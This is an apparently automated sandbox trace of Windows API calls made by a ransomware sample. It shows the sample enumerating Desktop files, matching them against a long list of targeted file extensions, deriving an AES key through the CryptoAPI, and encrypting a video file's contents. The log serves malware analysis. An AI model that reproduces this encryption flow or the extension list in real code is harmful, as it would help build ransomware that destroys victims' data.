	[0183.046] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d658f0, ftCreationTime.dwHighDateTime=0x1d975a6, ftLastAccessTime.dwLowDateTime=0xb49e42c0, ftLastAccessTime.dwHighDateTime=0x1d97667, ftLastWriteTime.dwLowDateTime=0xb49e42c0, ftLastWriteTime.dwHighDateTime=0x1d97667, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0183.049] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd15baac0, ftCreationTime.dwHighDateTime=0x1d96676, ftLastAccessTime.dwLowDateTime=0xad1ca850, ftLastAccessTime.dwHighDateTime=0x1d96a98, ftLastWriteTime.dwLowDateTime=0xad1ca850, ftLastWriteTime.dwHighDateTime=0x1d96a98, nFileSizeHigh=0x0, nFileSizeLow=0x13a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="2CxFdQB88_e1S3.avi", cAlternateFileName="2CXFDQ~1.AVI")) returned 1
	[0183.049] lstrcmpW (lpString1="2CxFdQB88_e1S3.avi", lpString2="..") returned 1
	[0183.049] lstrcmpW (lpString1="2CxFdQB88_e1S3.avi", lpString2=".") returned 1
	[0183.049] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.049] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="2CxFdQB88_e1S3.avi" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\2CxFdQB88_e1S3.avi") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\2CxFdQB88_e1S3.avi"
	[0183.049] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\2CxFdQB88_e1S3.avi") returned 66
	[0183.049] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.050] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\2CxFdQB88_e1S3.avi", cchLength=0x42 | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\2cxfdqb88_e1s3.avi") returned 0x42
	[0183.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.050] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\2cxfdqb88_e1s3.avi", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.050] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\2cxfdqb88_e1s3.avi" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\2cxfdqb88_e1s3.avi") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\2cxfdqb88_e1s3.avi"
	[0183.050] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\2cxfdqb88_e1s3.avi") returned 66
	[0183.050] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.050] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.051] StrStrW (lpFirst=".avi", lpSrch=".") returned=".avi"
	[0183.051] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.051] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".avi") returned 0x0
	[0183.051] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96e55e10, ftCreationTime.dwHighDateTime=0x1d971af, ftLastAccessTime.dwLowDateTime=0x332d2300, ftLastAccessTime.dwHighDateTime=0x1d974e1, ftLastWriteTime.dwLowDateTime=0x332d2300, ftLastWriteTime.dwHighDateTime=0x1d974e1, nFileSizeHigh=0x0, nFileSizeLow=0x9f2b, dwReserved0=0x0, dwReserved1=0x0, cFileName="cjIOTQYnZcd.mkv", cAlternateFileName="CJIOTQ~1.MKV")) returned 1
	[0183.051] lstrcmpW (lpString1="cjIOTQYnZcd.mkv", lpString2="..") returned 1
	[0183.051] lstrcmpW (lpString1="cjIOTQYnZcd.mkv", lpString2=".") returned 1
	[0183.051] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\"
	[0183.052] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\", lpString2="cjIOTQYnZcd.mkv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\cjIOTQYnZcd.mkv") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\cjIOTQYnZcd.mkv"
	[0183.052] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\cjIOTQYnZcd.mkv") returned 63
	[0183.052] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0183.052] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Desktop\\BeYl_s9Ay -D\\UXZZ\\cjIOTQYnZcd.mkv", cchLength=0x3f | out: lpsz="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv") returned 0x3f
	[0183.052] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.052] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv", lpSrch="help_decrypt_your_files") returned 0x0
	[0183.052] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv") returned="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv"
	[0183.052] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv") returned 63
	[0183.053] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.053] StrStrW (lpFirst=".mkv", lpSrch=".") returned=".mkv"
	[0183.053] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0183.053] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".mkv") returned=".mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0183.053] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0183.054] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0183.054] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\beyl_s9ay -d\\uxzz\\cjiotqynzcd.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0183.056] ReadFile (in: hFile=0x390, lpBuffer=0xfde188, nNumberOfBytesToRead=0x9f2b, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfde188*, lpNumberOfBytesRead=0x18a640*=0x9f2b, lpOverlapped=0x0) returned 1
	[0183.059] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.059] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcb5d8) returned 1
	[0183.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.061] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0183.061] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.061] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0183.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.062] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb9070) returned 1
	[0183.062] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.062] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x9f2b, dwBufLen=0x9f2b | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x9f30) returned 1
	[0183.075] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.075] RtlMoveMemory (in: Destination=0xfe80c0, Source=0xfde188, Length=0x9f2b | out: Destination=0xfe80c0) 
	[0183.075] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.075] CryptEncrypt (in: hKey=0xfb9070, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe80c0*, pdwDataLen=0x18a1ec*=0x9f2b, dwBufLen=0x9f30 | out: pbData=0xfe80c0*, pdwDataLen=0x18a1ec*=0x9f30) returned 1
	[0183.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.078] CryptDestroyKey (hKey=0xfb9070) returned 1
	[0183.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.078] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0183.078] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.081] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0183.081] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0183.081] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0183.082] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0183.082] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
